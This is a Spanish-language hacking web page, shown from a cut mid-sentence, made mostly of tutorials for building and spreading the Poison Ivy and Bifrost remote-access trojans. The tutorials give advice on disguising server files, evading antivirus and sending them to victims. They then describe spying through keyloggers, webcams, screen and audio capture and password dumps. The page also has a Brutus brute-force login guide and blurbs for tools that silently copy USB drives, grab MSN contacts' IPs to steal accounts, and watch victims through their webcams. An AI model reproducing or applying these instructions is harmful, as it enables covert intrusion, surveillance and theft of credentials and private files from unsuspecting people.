pc.

Descarga del poison:

Para descargarlo, hagan clic AQUI: http://www.programas-hack.com/troyanos/poison-ivy-230/


Ahora, tan solo les queda esperar a que descarge… y porsupuesto, no se
olviden de desactivar su antivirus antes para poder bajarlo..
Configuracion del cliente:

Una vez descargado, saquenlo del .zip para trabajar con el (boton
derecho->extract files…) y dejenlo en el escritorio, en mis documentos o
donde quieran…

A continuacion lo abren y ejecutan el Poison 2.3.0 (el icono es el de una

hoja gris) y hacen clic en file -> new client

Les aparecera una nueva ventana en la que deberan poner un password y el
numero de puerto por el que se comunicara el server. Recuerden que es
recomendable abrirlo en su router. Para ello encontran manuales en el

foro.

Hacen clic en start, y ya tendremos configurado el cliente.
Creacion del server.
Ahora, debemos volver a hacer clic en file-> y elegir new server

Les aparecera una nueva ventana, en la cual deberan hacer click en create
profile, y les aparecera un cuadro, donde tendran que escribir un
nombre… por ejemplo txshack… y dan a OK.
Ahora les aparecera lo siguiente:

En la parte DNS/PORT, dan a ADD y les aparecera un cuadro, donde deberan

poner su no-ip.
El puerto debera ser el mismo que colocaron antes (en la configuracion del

cliente) y el password tambien.
A continuacion hagan clic en NEXT.

En esta nueva ventana seleccionan la casilla de activeX Startup y click

en random. (No se les ocurra modificar el valor que sale!!)
Marcan el cuadro de copy file.
En filename, ponen uno que no levante sospecha, como systemc32.exe,

rschost.exe, windbs.exe…..etc
A continuacion, seleccionan la carpeta en la que quieren q se copie el

server, por ejemplo, system folder.
Y por ultimo seleccionan las opcciones que deseen… yo elijo las 3

Hacen clic en NEXT, y les aparecera una nueva ventana.

En process y keylogger mutex dejen el valor que les aparece por defecto.
El proceso donde se inyectara el troyano, viene por defecto el del

messenger… ustedes pueden cambiarlo por otro si quieren. pero cuidado!!

escribanlo bien
A continuacion dan a NEXT y les aparecera una ventana donde podran
cambiear el icono. Lo hacen si kieren ahora… y despues dan clic a
generate (no activen el cuadro de Executed third-party aplication after
build), eligen donde guardarlo y su server ya estara creado.
An visto que facil?? ahora solo les queda indetectabilizarlo y enviarlo para conseguir
victimas…

Opciones de las victimas:

Una vez que tengamos victimas, haciendo doble clic sobre ellas se nos
abrira una ventana, donde podremos activar el keyloger, ver su pantalla,
su cam, sus archivos, su registro….etc

Como veran disponen de varias opciones…. Les voy a explicar mas o menos
para que siven cada una, sin meterme muy a fondo, puesto que es una cosa
sencilla q comprenderan perfectamente cuando las vean.

Information: La informacion del pc victima

Files: aqui tenemos acceso a los archivos de la pc victima. Haciendo click derecho apareceran las siguientes opciones

Refresh Folder: para refrescar la carpeta, sirve por si borramos,
renombramos o hacemos algo….y no aparecen los cambios.

Search: para buscar archivos especificos en la pc victima. Grin

Show Thumbnails: para ver imagenes en miniatura de los iconos…ideal para identificar fotos.

Download: para descargar cualkier archivo

Upload: para subir algun archivo de tu PC al de la victima

Execute: trae dos opciones (excute->normal es decir visible a la victima) y (excute=>hidden invisible a la victima es decir de manera oculta)

Rename: para renombrar archivos o carpetas

Delete: para borrar archivos, programas….

Regedit: acceso al registro de nuestra victima

Processes: muestra los procesos activos en la pc de nuestra vicitima
haciendo click derecho en esta ventana veremos las siguientes opciones:

Refresh: para refrescar la carpeta

Show Modules: para mostrar los modulos q componen el proceso en el
cual estan

Kill Process: para matar el proceso seleccionado


Suspend Process
: para suspender el proceso seleccionado

Services: aqui vemos los servicios de la pc victima.
Si hacemos doble clic, apareceran las siguientes opciones.

Refresh: refresca la ventana

Save to file: crea un archivo .txt con la informacion del archivo

Start: para activar el servicio “start” como su nombre indica

Stop: sirve para detener un servicio activo

Edit: para editar el servicio

Install: instalar un servicio

Close: cierra la ventana en la pc victima

Uninstall
: desinstalar un servicio

windows: aqui se veran las ventanas que estan abiertas en la pc infectada.
Al hacer click sobr alguna de estas ventanas apareceran estas opciones:

Capture windows: para hacer una captura de dicha ventana

Show: muestra la ventana en la pc victima en caso d q este oculta

Hide: oculta la ventana la ventana en la pc victima

Maximize: maximiza la ventana la ventana en la pc victima

Minimize: minimiza la ventana la ventana en la pc victima

Active ports
: te permite poder ver los puertos activos de la victima

remote shell
: para abrir la consola de la victima… es lo similar a ir a
inicio -> ejecutar -> cmd

key logger: muestra las teclas q presiona la victima..

screen capture
: nos permite ver la pantalla de la victima… incluye las
siguientes opciones:

Stretch:
sirve para ajustar la pantalla de la victima a la ventana.

Mouse
:
…para manejar el mouse de la victima y poder clickear en donde queramos.

Keyboard
:
…sirve para manejar el teclado de la victima y poder escribir en donde
queramos.

Interval:
…es el intervalo de tiempo en que se toma una y otra captura.
Start:
…comienza a capturar pantallazos seguidamente.
Single:
…captura un unico pantallazo.
Save:
…sirve para guardar la pantalla en un archivo. Si seleccionamos

“Autosave” se guardaran todas las que se capturen.
Options:
…sirve para cambiar el tamaño y la calidad de la pantalla.

web cam capture: para ver la cam de la victima… si la tiene

Interval:
…el intervalo de tiempo entre cada captura.

Start:
…comienza a capturar imagenes.

Single:
…captura una unica imagen.

Driver:
…muestra las camaras web instaladas en la PC de la victima. Podemos
seleccionar cualquiera y con el boton “Activate” la activamos. Si no se
encuentra ninguna camara aparecera “No webcam installed!”

Save:
…para guardar la imagen a un archivo. Con “Autosave” se guardaran todas
automaticament e.

Edit id: aqui podremos cambiar el nombre de la victima

Share: para usar el server con otro cliente

DNS/Port: aqui agregaremos la cuenta de no-ip

ID: poner el nombre de la victima q se vera en el nuevo cliente

Password
: clave del nuevo cliente

Run in Same Process/New Process
: aqui el server se podra ejecutar en el
mismo proceso q estaba anteriormente o en uno nuevo

Privileges: son los privilegios q se le daran al nuevo cliente.

…Stretch:
…igual que en la captura de pantalla, sirve para ajustar la imagen a la

ventana.
…Interval:
…el intervalo de tiempo entre cada captura.
…Start:
…comienza a capturar imagenes.
…Single:
…captura una unica imagen.
…Driver:
…muestra las camaras web instaladas en la PC de la victima. Podemos

seleccionar cualquiera y con el boton “Activate” la activamos. Si no se

encuentra ninguna camara aparecera “No webcam installed!”
…Save:
…para guardar la imagen a un archivo. Con “Autosave” se guardaran todas

automaticamente.

Edit id: aqui podremos cambiar el nombre de la victima

Share: para usar el server con otro cliente

…DNS/Port: aqui agregaremos la cuenta de no-ip
…ID: poner el nombre de la victima q se vera en el nuevo cliente
…Password: clave del nuevo cliente
…Run in Same Process/New Process: aqui el server se podra ejecutar en el

mismo proceso q estaba anteriormente o en uno nuevo
…Privileges: son los privilegios q se le daran al nuevo cliente

…Y aqui concluye el manual…
Espero que les haya quedado claro…

 

 


Manual Bifrost 1.2.1


Introduccion:

El Bifrost se trata de un troyano de conexion inversa, es decir, que el server, una vez alojado en la Pc de nuestra victima, se conecta a nosotros para poder controlar su ordenador.

Comenzemos:

Pueden descargar el Bifrost de AQUÍ

Una vez descargado, ejecutenlo y les aparecera la pantalla principal del bifrost. En la parte inferior, hagan clic en Settings.

En ports: tienen 3 huecos a rellenar. Esto es el puerto por el que el sever se conectara con vosotros. Se conectara por el puerto que este primero escrito, si por este no puede lo ara por el 2º y sino por el 3º. En caso de que querais poner un solo puerto (por ejemplo el 2000) dejad los otros dos espacion en 0.

En password: introduzcan uno que recuerden.

En Name of extension after upload pondremos addon.dat (es el nombre que tendra la extension)

Despues seleccionaremo s tal y como se muestra en la imagen, la casilla, Msn style notification (para que al conectarse las victimas nos lo notifique con una ventana estilo a la del MSN)

Seleccionaremo s tambien, Compress file transfer ( que comprimirá los datos de la transferencia de archivos para que se realice más rápido)

Si marcamos la casilla, Check password for incoming connections, nos pedira la contraseña cada vez que halla una coñexion.

Method to determine flag, es la forma que bifrost determina la bandera del pais de la victima. Podemos elegir segun las opciones de region e idioma del PC, o segun el idioma que utilice el teclado.

Una vez echo esto, damos a ok, y ahora cliqueamos en Builder, que es donde crearemos el server.

En Dynamic DNS/IP deveremos ingresar nuestra IP, que sera a la que se conectara nuestro server. Pero existe un problema, que como la IP es dinamica (es decir va cambiando) cuando nuestro server se intente conectar a nuestra PC, cuando esta cambie no lo podra hacer. Por esta razon deveremos crear una no-ip, que lo que hace es redireccionar siempre nuestro server a nuestra IP en caso de que cambie. Es un proceso que tardaremos 10 minutos tan solo, y teneis su manual en esta misma seccion (troyanos y virus)
En este caso la no-ip que emos usado a sido “ejemplo.no-ip.info”. Una vez escrita, damos a Add.
En Password y Port deveremos escrivir lo mismo que en Settings.

Ahora pasemos a la lengueta Installation.

Filename when installed: sera el nombre con el que se instalara nuestro server en el pc de la victima. Es recomendable un nombre que no levante sospecah y que parezca cosa del sistema, como SR032.exe, SIP43.exe etc
Directory to install to: sera el nombre de la carpeta donde se instalara. Esta estara dentro de Systen32, y como en la vez anterior, es aconsejable algo que no levante sospecha como Systcod, RZWIN, 309CF, etc
El resto de las opciones lo mas aconsejable es marcarlas como en la imagen. (Si teneis alguna duda sobre que significa alguna de ellas, no dudeis en postear, os respondere con la mayor brebedad posible)

Bien, ahora pasemos a Stealth.

Como en la vez anterior, os aconsejo marcar las mismas casillas que en la imagen.
Aqui teneis su significado.
Stealth Mode: aqui elegimos el modo de ocultación del server. Si seleccionamos Visible mode,el server se ejecutara de forma visible. Si seleccionamos Cautious mode, el server se ejecutará de forma oculta, pero si no logra injectarse se cerrará para no ser descubierto. Si seleccionamos Agressive mode, el server se ejecutará de forma oculta, y si la inyección falla, intentará conectarse igual.
Set attribute hidden: el server tendrá la opción “Oculto” activada.
Set older file date: el server y su carpeta tendrán su fecha de creación antiguas.
Melt server: cuando el server sea ejecutado, va a desaparecer.
Kernel level unhooking: esta opción sirve para lograr pasar más cantidad de firewalls. Igualmente no es recomendable activarla, ya que esa función todavia es beta y puede presentar problemas.
Delayed Connection: sirve para darle al server un tiempo antes de ejecutarse. Si seleccionamos No delay se ejecutará inmediatamente . Con Delay to next reboot lo hará cuando la PC se reinicie. La tercera opción nos permite establecer un tiempo exacto, con días, minutos y horas, para que el server se ejecute.
Hide Process: intenta ocultar el proceso del server. Esta función requiere que la víctima posea Windows XP y que el usuario sea administrador. Igualmente, es beta y es probable que no funcione correctamente.

La ventana de Miscellanius, es una forma de conectarse a una red TOR, pero por su complejidad y posibles fallos que pueda producir, es aconsejable no marcarla.

Y bien, una vez echo esto, ya tenemos nuextro server configurado. Ahora hacemos clic en Build, y se creara el server.exe en la carpeta donde tengamos el bifrost.

Bien, aora ya tenemos el server creado. Este sera el que deveremos enviar a nustra victima, lo cual es algo mas complicado, pero no dificil. Para que resulte mas facil deveremos hacerlo indetectable para los anti virus y enviarlo por correo o subirlo a lagun servidor para que lo descarguen.

Despues el uso que le den, pues ya depende de cada quien…

Pueden sacar informacion muy personal de la gente, como por ejemplo contraseñas…

… aechivos e imagenes de su pc… etc, asi que tratenlo con respeto hacia la persona… no agan lameradas… y sean buenos xD

Si tienen alguna pregunta no duden en postear.

 


Todo sobre brutus


Bueno, os hago otro tutorial para los newbies que no sepan manejar el Brutus que explicaré que es, como se usa y para que.

¿Qué es brutus?

Brutus es un programa de fuerza bruta capaz de adivinar contraseñas mediante diccionarios de

palabras, los diccionarios están en un .DOC y tu mismo puedes crearlo.

* ¿Qué es fuerza bruta?

Fuerza Bruta es intentar logearse en una web,en una cuenta FTP, masivamente mediante el

diccionario .TXT, la fuerza bruta se suele usar para webs o ftp’s que queremos entrar para investigar…

* ¿Cómo se usa?

Siguan el manual que comienza ahora

Lo primero que deberemos hacer es bajar el brutus…Y lo bajaremos de su propia web:

http://www.programas-hack.com/crackers/brutus-aet2/

Una vez descardado procedemos a ejecutarlo, ¡ojo!, brutus es detectado por los antivirus…

De ese modo que deberemos quitar el antivirus para mejor funcionamiento y que no nos dé quejas

nuestro querido antivirus.

Bien… Una vez abierto como vemos arriba donde sale Target deberemos poner una IP de una web

en Type pondremos un protocolor… POP 3… NetBus… FTP….

En Method pondremos HEAD… Podeís cambiarlo si quereis…En User File pondremos el users.txt

que nos vino dentro del Brutus al bajarlo y en pass file lo mismo, solo que con pass.txt o el nombre

que tenga..Una vez hecho eso damos a Start:

Como veis ha encontrado ciertas palabras… A encontrado Administrador y Admin… Eso quiere decir

que el login puede ser alguno de esos… Pero para estar más seguros deberemos dar a Method Get

y esperar un largo tiempo…Igual en sacarte el usuario y clave tardamos 2 meses… Pero… Es lo que hay xD

Luego ya por lo demás… No tiene gran misterio… Es cuestión de cotillear el programa y saber manejarlo

Es fácil….Saludos!!!

Robar datos de los discos extraíbles


Esta aplicacion sirve para robar toda la información que se almacene en un disco extraible, puede ser utilizado en ciberCafes, colegios, universidades, etc.
Cuando se inserta un disco extraible (pendrive, mp3, mp4, camaras, etc.) todos los datos serán copiados de forma silenciosa a una carpeta oculta.
Este programa puede ser muy útil para algunos.


ResHacker3.4.0.79


ResHacker3.4.0.79Resource Hacker es un programa gratuito diseñado para ayudar a visualizar, modificar, añadir, borrar y extraer recursos en ejecutables de Windows de 32 bits. It incorporates an internal resource script compiler and decompiler and works on all 32 Bit Windows OS. Se hace un script compilador de recursos internos y decompiler y funciona en todos los SO de 32 bits de Windows.


 

Here are some key features of “Resource Hacker”: Aquí están algunas de las principales características de “Resource Hacker”:

· Viewing Resources: Cursor, Icon, Bitmap, GIF, AVI, and JPG resource images can be viewed. Visualización de Recursos: Cursor, Icon, Bitmap, GIF, AVI, JPG y los recursos se pueden ver las imágenes. WAV and MIDI audio resources can be played. WAV y MIDI recursos de audio se pueden reproducir. Menus, Dialogs, MessageTables, StringTables, Accelerators Menús, Diálogos, MessageTables, StringTables, Aceleradores

, Delphi Forms, and VersionInfo resources can be viewed as decompiled resource scripts. , Las formas de Delphi, y VersionInfo recursos puede considerarse como decompiled recursos scripts. Menus and Dialogs can also be viewed as they would appear in a running application. Menús y Diálogos también puede ser visto como se mostrarían en una aplicación en ejecución.

· Saving Resources: Resources can be saved as image files (*.ico, *.bmp etc), as script files (*.rc), as binary resource files (*.res), or as untyped binary files (*.bin). Ahorro de Recursos: Los recursos se pueden guardar como archivos de imagen (*. ico, *. bmp, etc), como archivos de secuencia de comandos (*. rc), como archivos binarios de recursos (*. res), o como untyped archivos binarios (*. bin ).

· Modifying Resources: Resources can be modified by replacing the resource with a resource located in another file (*.ico, *.bmp, *.res etc) or by using the internal resource script compiler (for menus, dialogs etc). Modificación de los recursos: Los recursos pueden ser modificadas mediante la sustitución de los recursos con los recursos ubicados en otro archivo (*. ico, *. bmp, *. res, etc) o utilizando la secuencia de comandos de compilador de recursos internos (los menús, cuadros de diálogo, etc.) Dialog controls can also be visually moved and/or resized by clicking and dragging the respective dialog controls prior to recompiling with the internal compiler. Diálogo de los controles también puede ser trasladado visualmente y / o cambiar de tamaño haciendo clic y arrastrando el cuadro de diálogo respectivos controles antes de recompilar con el compilador interno.

· Adding Resources: Resources can be added to an application by copying them from external resource files (*.res).Agregando Recursos: Los recursos se pueden agregar a una solicitud de la copia de los ficheros de recursos externos (*. res).

· Deleting Resources: Most compilers add resources into applications which are never used by the application. Borrado de Recursos: La mayoría de los compiladores añadir recursos en aplicaciones que nunca son utilizados por la aplicación.Removing unused resources can reduce an application’s size. Extracción de recursos no puede reducir el tamaño de una solicitud.


Achilles 0.27


achillesAchilles es una herramienta designada para comprobar la seguridad de aplicaciones web. Achilles es un servidor proxy, que actúa como una persona-en-el-medio {man-in-the-middle} durante una sesión de HTTP. Un proxy de HTTP típico pasa paquetes hacia y desde el explorador de web cliente y un servidor de web. Achilles intercepta los datos en una sesión de HTTP en cualquier dirección y le da al usuario la habilidad de alterar los datos antes de ser transmitidos. Por ejemplo, durante una conexión de HTTP SSL normal, un proxy típico pasa la sesión entre el servidor y el cliente y permite a ambos nodos negociar SSL. En contraste, cuando Achilles está en modo de intercepción, Achilles simula ser el servidor y negocia dos sesiones de SSL, una con el explorador de web cliente y otra con el servidor de web. Mientras la información se transmite entre ambos nodos, Achilles descifra los datos y le da al usuario la habilidad de alterar y/o registrar los datos en texto claro antes de su transmisión.


Sacar la Ip de tus contactos MSN


Con este util programa podras Robar la IP de tus contactos del Msn, Sólo con enviarle un mensaje o archivo ( foto, animacion…), mientras lo recibe, ejecutas el programa y haces Click en ” Sacar Ip” y te aparecera su ip. Asi de fácil.

Nota: Con este programa te sera muy fácil robar una cuenta hotmail, msn, gmail si usas un troyano o keylogger

Sacar la Ip de tus contactos MSN


Programa recomendado

[TUTORIAL] Uso del poison ivy


bueno señores, este, para mi es uno de los mejores troyanos que hay, por ser un troyano de conexion inversa, ofrece mejor funcionalidad…

 

Cita:

Empezado por wikipedia

 

os troyanos de conexión inversa son los que hacen que el servidor sea el que se conecte al cliente; las ventajas de éste son que traspasan la mayoría de los firewall y pueden ser usados en redes situadas detrás de un router sin problemas.

bueno, comenzamos, para empezar, nuestro lugar de trabajo XD, cuando abrimos el poison ivy, vemos esto…

ID:muestra el nombre que le dimos a la victima.
WAN:muestra la IP de internet de la victima.
LAN:muestra la IP de red de la victima.
Computer: muestra el nombre de la PC de la victima.
User Name: muetra el nombre del usuario activo en la PC de la victima.
Acc. Type:muestra el tipo de sesion que esta activo en la PC de la victima.
OS: muestra el sistema operativo (operating system)(Windows 98, ME, 2000, XP, Linux, etc)
CPU:nos dira la cantidad de megahertz (MHz) que tiene el procesador de la PC de la victima.
RAM:nos dira la cantidad de memoria RAM que posee la PC de la victima.
Version:indica la version del server que tiene instalada la victima.
Ping:indica la velocidad de conexion con la victima. entre mas alto es el numero, mas dificil es la conexion
Port: xxxx :indica el puerto que estamos escuchando.
Connection: xx :indica la cantidad de conexiones que tenemos.

bueno, esto en general de la ventana del poison, ahora damos doble clic sobre la victima, y nos aparecera otra ventana…

primero tenemos la ventana information

aca aparece la informacion sobre la PC y sobre el server que
estamos utilizando…

luego tenemos en Manager, Files…
sirve para ver todos archivos en la PC de la victima…

con esta opcion podemos refresar la ventana, buscar archivos o carpetas, ver iconos grandes, subir archivos o carpetas, descargar archivos o carpetas, ejecutar archivos de forma visible u oculta, renombrar archivos o carpetas, borrar archivos normalmente o de manera segura. esto es util por ejemplo si keremos robar un archivo o si keremos ejecutar algun otro virus en la PC infectada..

luego tenemos en manager, Search
sirve para buscar archivos en la PC de la victima

explico:
File name: aqui va el nombre del archivo.
A word in the file: si no sabemos el nobmre, escribimos alguna palabra ke contenga
Search in: donde buscar
Include subdirectories: opcion para que busque en los subdirectorios de la busqueda
Fuzzy: si la seleccionamos, va a encontrar cualquier archivo que contenga nuestra palabra de busqueda.
Case sensitive: para que mayusculas y minusculas coincidan
Search:comenzar busqueda
Stop:detener busqueda

luego tenemos en manager, regedit
sirve para acceder a los registros de la PC infectada

luego en manager, tenemos regedit-search
sirve para buscar un registro en especifico y se usa de la misma manera que el buscador de archivos, solo se le agregan las opciones valores y claves

ahora esta la opcion processes, donde miramos los procesos de la victima
con el boton derecho podemos refrescar, matar procesos, suspender procesos y guardar un archivo

ahora tenemos la opcion services, que sirve para ver los servicios que esta utilizando la PC infectada

con el clic derecho podemos:
refrescar, guardar a un archivo, iniciar o detener un servicio, editar, instalar y desinstalar servicios.

luego tenemos la opcion installed aplications, que nos muestra los programas instalados en la PC infectada…

aqui con el clic derecho podemos refrescar la ventada, desinstalar una aplicacion o guardar un archivo

ahora vamos con windows, que es donde estan todas las ventanas en uso

con esta opcion podemos refrescar, capturar la ventana, enviar teclas para que sean presionadas en la PC remota, mostrar la ventana en la PC remota, esconder la ventana, maximizar, minimizar y cerrar la ventana.

bueno, ahora pasamos a tools, lo primero que tenemos ahi es relay
esta opcion nos sirve para ver y manipular el trafico entre los diferentes proxys y servers. Esta opcion es valida si nosotros agregamos algun servidor intermedio cuando configuramos el server (en Socks4).

Se pueden capturar passwords, nombres de usuario e informacion que hayan quedado registrados a lo largo de la conexion que establecimos a traves de los proxys. Tambien tiene opciones de filtro, para que no aparezca informacion que no queramos.

luego de esto tenemos la opcion Active ports
sirve para ver que puertos TCP y UDP estan abiertos en la PC de la victima. Es lo mismo que hacer un netstat

con el clic derecho en esta opcion podemos refrescar, guardar a un archivo, resolver el DNS, capturar paquetes, matar la conexion y matar el proceso.

luego esta la opcion remote shell
sirve para manejar la consola MS-DOS de la PC infectada

Para activarla hay que hacer clic derecho y elegir la opcion “Activate”. Tambien podemos guardar el registro a un archivo y limpiar la ventana

luego vamos con la opcion passwords audits, ahi tenemos tres opciones Cached, NT/NTLM Hashes y Wireless
primero Cached, son los passwords ke kedan en los exploradores y mensajeros (creo)

NT/NTLM Hashes, me parece que son los passwords de windows ^^

y Wireless, los passwords de las conexiones wireless ke ha usado la PC infectada

———-
bueno, ahora pasamos a surveillance empezando por keylogger
este es el que capta todas las pulsaciones de teclas que se han hecho n la PC infectada, ideal para robar password

luego tenemos audio capture, para escuchar lo que escucha la victima

luego esta screen capture, que puede servir como un escritorio remoto

Stretch:sirve para ajustar la pantalla de la victima a la ventana.
Mouse:sirve para manejar el mouse de la victima y poder clickear en donde queramos.
Keyboard:sirve para manejar el teclado de la victima y poder escribir en donde queramos.
Interval:es el intervalo de tiempo en que se toma una y otra captura.
Start:comienza a capturar pantallazos seguidamente.
Single:captura un unico pantallazo.
Save:sirve para guardar la pantalla en un archivo. Si seleccionamos “Autosave” se guardaran todas las que se capturen.
Options:sirve para cambiar el tamaño y la calidad de la pantalla.

y por ultimo webcam capture que captura imagenes a travez de la webcam de la victima ^^

funciona de la misma manera que screen capture

luego en la seccion plug ins, donde iran todos los plug ins ke le instalemos al troyano, nos viene la opcion port scanner 1.0.0 que sirve para escanear remotamente los puertos abiertos de la PC infectada

luego en las opciones de administracion encontramos
Edit ID: que sirve para cambiar el nombre de la victima que aparece cuando se conecta con nosotros

share: que sirve para agregar otra ip o servidor de no-ip y asi compartir al conexion de la victima con alguien

DNS/Port: aca agregaremos la nueva IP o dominio NO-IP.
ID: el nombre con el que se conectara la victima en ese nuevo dominio.
Password: la clave del server en ese nuevo dominio.
Socks4:si se quieren agregar proxys o servidores intermedios.
Run in Same Process/New Process: para que el server se ejecute en el mismo proceso o uno nuevo.
Privileges: para que el server compartido tenga los permisos apropiados. Full (el server compartido tiene acceso a todas las opciones), Normal (al server compartido no se le esta permitido cambiar opciones de administracion del server), Restricted (al server compartido no se le esta permitido utilizar opciones peligrosas).

Update: actualizar el server a uno nuevo que hayamos creado.

Restart: resetear el server.

Uninstall: desinstalar el server.

espero este tutorial le haya servido de algo a alguien XD… comentarios, puteadas, halagos, insultos, todo aca ^^

Hecho por SoLiD SnAkE



 

 




Control Webcam


Control webcamPrograma que le permitirá controlar la cámara Web de su víctima, con este programa podrá observar todo lo hace su víctima al conectarse enInternet, cuando esta en su PC, sin levantar ninguna sospecha, cada vez que se conecte a Internet deberá obtener la IP para poder conectarse a su PC y poder ver imagenes con su Webcam y hasta tomar fotografías.

Muy recomendado!.


 

 


Bifrost 1.2.1


bifrost 1.2.1Bifrost es un troyano de conexion inversa, esto significa que el server se conecta a tu pc en vez de que tengas que conectarte vos a el, necesitando su ip. En estos momentos es unos de los mejores troyanos.
Características: Cam Capture, File Manager, File Search, Offline/Online Keylogger, Password List (protected storage, cached passwords, icq, cd keys), Polymorphic Plugin, Process List, Remote Shell, Screen Capture, System Info and Windows List.










 

 

 

 

 

 

 

 

 

 

 

 

Contador


INFECTOR Web || Diseñado by Matias Lawwliet                                                                                                                                                                      © All Right Reserved 2012

Este sitio web fue creado de forma gratuita con PaginaWebGratis.es. ¿Quieres también tu sitio web propio?
Registrarse gratis